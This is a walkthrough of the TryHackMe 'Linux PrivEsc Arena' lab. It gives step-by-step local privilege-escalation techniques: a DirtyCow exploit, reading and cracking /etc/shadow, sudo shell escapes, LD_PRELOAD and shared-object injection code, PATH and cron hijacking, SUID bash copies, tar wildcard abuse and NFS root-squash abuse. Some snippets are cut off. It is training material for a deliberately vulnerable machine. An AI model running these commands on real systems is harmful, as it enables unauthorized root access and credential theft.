Linux PrivEsc Arena TryHackMe Writeup/Walkthrough

Shivam Taneja
10 min readSep 9, 2022

Linux PrivEsc Arena

Today we will learn how to escalate privileges using a very vulnerable Linux VM. SSH is open.

Linux PrivEsc Arena


  1. Kernel Exploits
  2. Stored Passwords & Keys
  3. Misconfigured Binaries
  4. Abusing SUID/GUID
  5. Capabilities
  6. Exploiting Crontab
  7. NFS Enumeration

Connecting to the TryHackMe network

You can either use the browser-based terminal (which appears when you deploy the machine), or you can connect to TryHackMe’s network (via OpenVPN) and SSH in directly. If you’ve not done this before, first complete the OpenVPN room and learn how to connect.

  • Read the above.

No answer needed

Deploy the vulnerable machine

Let’s first connect to the machine. SSH is open on port 22. Your credentials are:

  • username: TCM
  • password: Hacker123
  • Deploy the machine and log into the user account via SSH (or use the browser-based terminal).

No answer needed

Privilege Escalation — Kernel Exploits


Linux VM

  1. In command prompt type: /home/user/tools/linux-exploit-suggester/
  2. From the output, notice that the OS is vulnerable to “dirtycow”.


Linux VM

  1. In command prompt type: gcc -pthread /home/user/tools/dirtycow/c0w.c -o c0w
  2. In command prompt type: ./c0w

TCM@debian:~$ gcc -pthread /home/user/tools/dirtycow/c0w.c -o c0w

TCM@debian:~$ ./c0w


(o o)_____/

@@ ` \

\ ____, //usr/bin/passwd

// //

^^ ^^

DirtyCow root privilege escalation

Backing up /usr/bin/passwd to /tmp/bak

mmap 13657000

madvise 0

ptrace 0

TCM@debian:~$ passwd

root@debian:/home/user# id

uid=0(root) gid=1000(user) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)


  1. Click ‘Completed’ once you have successfully elevated the machine

No answer needed

Privilege Escalation — Stored Passwords (Config Files)


Linux VM

  1. In command prompt type: cat /home/user/myvpn.ovpn
  2. From the output, make note of the value of the “auth-user-pass” directive.
  3. In command prompt type: cat /etc/openvpn/auth.txt
  4. From the output, make note of the clear-text credentials.
  5. In command prompt type: cat /home/user/.irssi/config | grep -i passw
  6. From the output, make note of the clear-text credentials.

TCM@debian:~$ cat myvpn.ovpn


dev tun

proto udp

remote 1194

resolv-retry infinite




ca ca.crt


remote-cert-tls server

auth-user-pass /etc/openvpn/auth.txt


verb 1

reneg-sec 0

TCM@debian:~$ cat /etc/openvpn/auth.txt




What password did you find?


What user’s credentials were exposed in the OpenVPN auth file?


Privilege Escalation — Stored Passwords (History)


Linux VM

  1. In command prompt type: cat ~/.bash_history | grep -i passw
  2. From the output, make note of the clear-text credentials.

TCM@debian:~$ cat ~/.bash_history | grep -i passw

mysql -h somehost.local -uroot -ppassword123

cat /etc/passwd | cut -d: -f1

awk -F: '($3 == "0") {print}' /etc/passwd

What was TCM trying to log into?


Who was TCM trying to log in as?


Naughty naughty. What was the password discovered?


Privilege Escalation — Weak File Permissions


Linux VM

  1. In command prompt type: ls -la /etc/shadow
  2. Note the file permissions


Linux VM

  1. In command prompt type: cat /etc/passwd
  2. Save the output to a file on your attacker machine
  3. In command prompt type: cat /etc/shadow
  4. Save the output to a file on your attacker machine

Attacker VM

  1. In command prompt type: unshadow <PASSWORD-FILE> <SHADOW-FILE> > unshadowed.txt

Now, you have an unshadowed file. We already know the password, but you can use your favorite hash cracking tool to crack dem hashes.

For example: hashcat -m 1800 unshadowed.txt rockyou.txt -O

TCM@debian:~$ ls -la /etc/shadow

-rw-rw-r-- 1 root shadow 809 Jun 17 23:33 /etc/shadow

  1. What were the file permissions on the /etc/shadow file?


Privilege Escalation — SSH Keys


Linux VM

  1. In command prompt type: find / -name authorized_keys 2> /dev/null
  2. In a command prompt type: find / -name id_rsa 2> /dev/null
  3. Note the results.


Linux VM

  1. Copy the contents of the discovered id_rsa file to a file on your attacker VM.

Attacker VM

  1. In command prompt type: chmod 400 id_rsa
  2. In command prompt type: ssh -i id_rsa root@

You should now have a root shell :)

TCM@debian:~$ find / -name authorized_keys 2> /dev/null

TCM@debian:~$ find / -name id_rsa 2> /dev/null



  1. What’s the full file path of the sensitive file you discovered?

Privilege Escalation — Sudo (Shell Escaping)


Linux VM

  1. In command prompt type: sudo -l
  2. From the output, notice the list of programs that can run via sudo.


Linux VM

In command prompt type any of the following:

  1. sudo find /bin -name nano -exec /bin/sh \;
  2. sudo awk 'BEGIN {system("/bin/sh")}'
  3. echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
  4. sudo vim -c '!sh'
  • Click ‘Completed’ once you have successfully elevated the machine

No answer needed

Privilege Escalation — Sudo (Abusing Intended Functionality)


Linux VM

  1. In command prompt type: sudo -l
  2. From the output, notice the list of programs that can run via sudo.


Linux VM

  1. In command prompt type: sudo apache2 -f /etc/shadow
  2. From the output, copy the root hash.

Attacker VM

  1. Open command prompt and type: echo '[Pasted Root Hash]' > hash.txt
  2. In command prompt type: john --wordlist=/usr/share/wordlists/nmap.lst hash.txt
  3. From the output, notice the cracked credentials.
  • Click ‘Completed’ once you have successfully elevated the machine

No answer needed

Privilege Escalation — Sudo (LD_PRELOAD)


Linux VM

  1. In command prompt type: sudo -l
  2. From the output, notice that the LD_PRELOAD environment variable is intact.


  1. Open a text editor and type:

#include <stdio.h>

#include <sys/types.h>

#include <stdlib.h>

void _init() {






  1. Save the file as x.c
  2. In command prompt type: gcc -fPIC -shared -o /tmp/ x.c -nostartfiles
  3. In command prompt type: sudo LD_PRELOAD=/tmp/ apache2
  4. In command prompt type: id
  1. Click ‘Completed’ once you have successfully elevated the machine

No answer needed

Privilege Escalation — SUID (Shared Object Injection)


Linux VM

  1. In command prompt type: find / -type f -perm -04000 -ls 2>/dev/null
  2. From the output, make note of all the SUID binaries.
  3. In command line type: strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file"
  4. From the output, notice that a .so file is missing from a writable directory.


Linux VM

  1. In command prompt type: mkdir /home/user/.config
  2. In command prompt type: cd /home/user/.config
  3. Open a text editor and type:

#include <stdio.h>

#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {

system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");


  1. Save the file as libcalc.c
  2. In command prompt type: gcc -shared -o /home/user/.config/ -fPIC /home/user/.config/libcalc.c
  3. In command prompt type: /usr/local/bin/suid-so
  4. In command prompt type: id
  1. Click ‘Completed’ once you have successfully elevated the machine

No answer needed

Privilege Escalation — SUID (Symlinks)


Linux VM

  1. In command prompt type: dpkg -l | grep nginx
  2. From the output, notice that the installed nginx version is below 1.6.2–5+deb8u3.


Linux VM — Terminal 1

  1. For this exploit, it is required that the user be www-data. To simulate this escalate to root by typing: su root
  2. The root password is password123
  3. Once escalated to root, in command prompt type: su -l www-data
  4. In command prompt type: /home/user/tools/nginx/ /var/log/nginx/error.log
  5. At this stage, the system waits for logrotate to execute. In order to speed up the process, this will be simulated by connecting to the Linux VM via a different terminal.

Linux VM — Terminal 2

  1. Once logged in, type: su root
  2. The root password is password123
  3. As root, type the following: invoke-rc.d nginx rotate >/dev/null 2>&1
  4. Switch back to the previous terminal.

Linux VM — Terminal 1

  1. From the output, notice that the exploit continued its execution.
  2. In command prompt type: id

TCM@debian:~$ dpkg -l | grep nginx

ii nginx-common 1.6.2-5+deb8u2~bpo70+1 small, powerful, scalable web/proxy server - common files

ii nginx-full 1.6.2-5+deb8u2~bpo70+1 nginx web/proxy server (standard version)

What CVE is being exploited in this task?


What binary is SUID enabled and assists in the attack?



Privilege Escalation — SUID (Environment Variables #1)


Linux VM

  1. In command prompt type: find / -type f -perm -04000 -ls 2>/dev/null
  2. From the output, make note of all the SUID binaries.
  3. In command prompt type: strings /usr/local/bin/suid-env
  4. From the output, notice the functions used by the binary.


Linux VM

  1. In command prompt type: echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
  2. In command prompt type: gcc /tmp/service.c -o /tmp/service
  3. In command prompt type: export PATH=/tmp:$PATH
  4. In command prompt type: /usr/local/bin/suid-env
  5. In command prompt type: id

TCM@debian:~$ strings /usr/local/bin/suid-env











l$ L



service apache2 start


  1. What is the last line of the “strings /usr/local/bin/suid-env” output?

service apache2 start

Privilege Escalation — SUID (Environment Variables #2)


Linux VM

  1. In command prompt type: find / -type f -perm -04000 -ls 2>/dev/null
  2. From the output, make note of all the SUID binaries.
  3. In command prompt type: strings /usr/local/bin/suid-env2
  4. From the output, notice the functions used by the binary.

Exploitation Method #1

Linux VM

  1. In command prompt type: function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
  2. In command prompt type: export -f /usr/sbin/service
  3. In command prompt type: /usr/local/bin/suid-env2

Exploitation Method #2

Linux VM

  1. In command prompt type: env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'

TCM@debian:~$ strings /usr/local/bin/suid-env2










l$ L



/usr/sbin/service apache2 start


  1. What is the last line of the “strings /usr/local/bin/suid-env2” output?

/usr/sbin/service apache2 start

Privilege Escalation — Capabilities


Linux VM

  1. In command prompt type: getcap -r / 2>/dev/null
  2. From the output, notice the value of the “cap_setuid” capability.


Linux VM

  1. In command prompt type: /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
  2. Enjoy root!
  1. Click ‘Completed’ once you have successfully elevated the machine

Privilege Escalation — Cron (Path)


Linux VM

  1. In command prompt type: cat /etc/crontab
  2. From the output, notice the value of the “PATH” variable.


Linux VM

  1. In command prompt type: echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/
  2. In command prompt type: chmod +x /home/user/
  3. Wait 1 minute for the Bash script to execute.
  4. In command prompt type: /tmp/bash -p
  5. In command prompt type: id
  1. Click ‘Completed’ once you have successfully elevated the machine

Privilege Escalation — Cron (Wildcards)


Linux VM

  1. In command prompt type: cat /etc/crontab
  2. From the output, notice the script “/usr/local/bin/”
  3. In command prompt type: cat /usr/local/bin/
  4. From the output, notice the wildcard (*) used by ‘tar’.


Linux VM

  1. In command prompt type: echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/
  2. touch /home/user/--checkpoint=1
  3. touch /home/user/--checkpoint-action=exec=sh\
  4. Wait 1 minute for the Bash script to execute.
  5. In command prompt type: /tmp/bash -p
  6. In command prompt type: id
  1. Click ‘Completed’ once you have successfully elevated the machine

Privilege Escalation — Cron (File Overwrite)


Linux VM

  1. In command prompt type: cat /etc/crontab
  2. From the output, notice the script “”
  3. In command prompt type: ls -l /usr/local/bin/
  4. From the output, notice the file permissions.


Linux VM

  1. In command prompt type: echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/
  2. Wait 1 minute for the Bash script to execute.
  3. In command prompt type: /tmp/bash -p
  4. In command prompt type: id
  • Click ‘Completed’ once you have successfully elevated the machine

Privilege Escalation — NFS Root Squashing


Linux VM

  1. In command line type: cat /etc/exports
  2. From the output, notice that “no_root_squash” option is defined for the “/tmp” export.


Attacker VM

  1. Open command prompt and type: showmount -e MACHINE_IP
  2. In command prompt type: mkdir /tmp/1
  3. In command prompt type: mount -o rw,vers=2 MACHINE_IP:/tmp /tmp/1
  4. In command prompt type: echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c
  5. In command prompt type: gcc /tmp/1/x.c -o /tmp/1/x
  6. In command prompt type: chmod +s /tmp/1/x

Linux VM

  1. In command prompt type: /tmp/x
  2. In command prompt type: id
  • Click ‘Completed’ once you have successfully elevated the machine

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Shivam Taneja
Shivam Taneja

Written by Shivam Taneja

IT Security Consultant, Researcher, Penetration Tester & Hacker.

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